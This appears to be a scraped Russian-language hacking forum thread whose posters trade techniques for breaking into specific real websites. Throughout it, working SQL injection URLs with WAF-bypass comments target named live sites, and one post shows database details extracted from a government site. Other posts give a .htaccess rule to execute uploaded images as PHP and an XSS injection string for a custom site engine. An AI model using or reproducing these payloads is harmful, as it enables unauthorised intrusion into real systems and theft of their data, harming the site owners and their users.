Помогите раскрутить http://www.dob.ee/listings.php?category=-333'+order+by+1+/*+ чё-то тыкаюсь и никак... =(
такой вопросик, как обойти запрет на загрузку файлов с расширением .php (я в админке), через перехват данных не катит, и php1 php2 php3 и т.д. тоже ps можно заливать txt jpg, но при переименовке грит пшол ты...
Можно попробывать .jpg.php, но вряд ли сработает. Если каким-либо образом существует доступ к БД, то можно попробывать это.
неа jpg.php не катит, через скулю тоже не пройдет там фильтруется кавичка. Я где-то видел статью, или это так может быть хто писал, что можно попробывать альтернативние расширения типа .php, но какие это расширение я не помню((, может кто знает напишите плз.
Там скорее белый фильтр стоит, чем черный. Есть ли доступ к .htaccess? Code: AddType application/x-httpd-php .php .jpg
Нашел активную xss в самописном движке одного локального сайта. PHP: <script> ........... var UNBS={221122:{md:"0",nk:"injs",sex:"m",pic:"01.gif",rc:4,flg:0,hp:101,x:1,y:7,lnm:"111",rnm:"111",lpc:"2222",rpc:"222",inj:[0,0,0,0,0],rt:156.971428571429,tn:0,ah:40,ab:30,al:35,ar:35,af:10}}; ......... function start() { Redraw(); AddData([{act:14[INJECT],nmb:22},{tm:"16:16",act:1,chng:[{unb:202636351,x:3,y:9,tn:0}]}{tm:"16:19",act:1,chng:[{unb:202636351,x:3,y:9,tn:0}]}],1); ReloadReq = 0; setTimeout("correctTimer()",1000); } </script> в [INJECT] могу вставить любой код. можно ли средствами js поменять значения первой части скрипта(между точками) с rnm:"111"(например) на rnm:"222"?
В зависимости от того, что делает функция AddData, инъектировать можно, например, }],1);UNBS[221122].rnm='something';//
мне нельзя прерывать тот код. да вставить алерты как раз плюнуть. мне интересно, можно ли обратиться к коду выше, изменить одну переменную не прерывая adddata. так как я adddata - динамично изменяется и строк так 50 занимает)
Функция AddData будет выполнена, ее вызов мы отменить не можем. Можем только косвенно влиять на результат ее работы, манипулируя передваваемым объектом. Я подправил предыдущий пост, там вместо алерта присвоение идет. Впринципе, можно это присвоение сделать и иначе: Code: ,tmp:UNBS[221122].rnm='something'
Столкнулся с очередным инжектом в MSSQL.При подборе через order by мне выдало 12 полей.ок.Делаю union (без all) по 12 null-полям,ошибка.Решил проверить,что на это скажет панголин - он отослал запрос union all select + 13 null-ов.Работает.Теперь вопрос,почему не работает у меня... ЗЫ: Возможности глянуть сам запрос нет.
это понятно... только вывод не сделать никак, 406 ошибку выдает... я так понимаю в браузере дело... каким лучше пользоваться? ...или я чего-то недогоняю... все методы пробовал... и error based не катит...
вообщем там WAF, и два запроса к базе: 1. http://www.dob.ee/listings.php?category=399)+order+by+2%23 - false, true 2.http://www.dob.ee/listings.php?category=399)+order+by+89%23 - false, false (в моей практике впервые столько колонок (88)) + еще фильтрация union, и =, походу но может и еще на что то, можно пробывать так но чет не пляшет нифига: Code: http://www.dob.ee/listings.php?category=333)+/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88%23 походу просто нет принтабельных полей а это значит - blind, но как раскрутить слепую с фильтром знака "=" я незнаю((
http://www.dob.ee/listings.php ?category=3)and(select+1+from(select+/*!count(*)*/,concat((select+schema_name+from+information_schema.schemata+limit+1,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)%23 Cтоит фильтр на count, обходится как у меня в линке. Upd: так же как и обычно. Только правильностью будет false 50 <> 50 = false. То что надо.
Code: http://www.jigawastate.gov.ng/contentpage.php?id=-255'+/!*group*/+by+/!*concat*/(left(version(),64),floor(rand(0)*2))+having+min(0)+--+ I tried most injections but do not work on it.
http://www.jigawastate.gov.ng/contentpage.php?id=-255'+/*!union+select*/+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,0+--+ 5.1.56:jigawa_jigawa:jigawa@localhost use google to translate this: КУРИ МАНУАЛЫ БЛЕАТЬ !11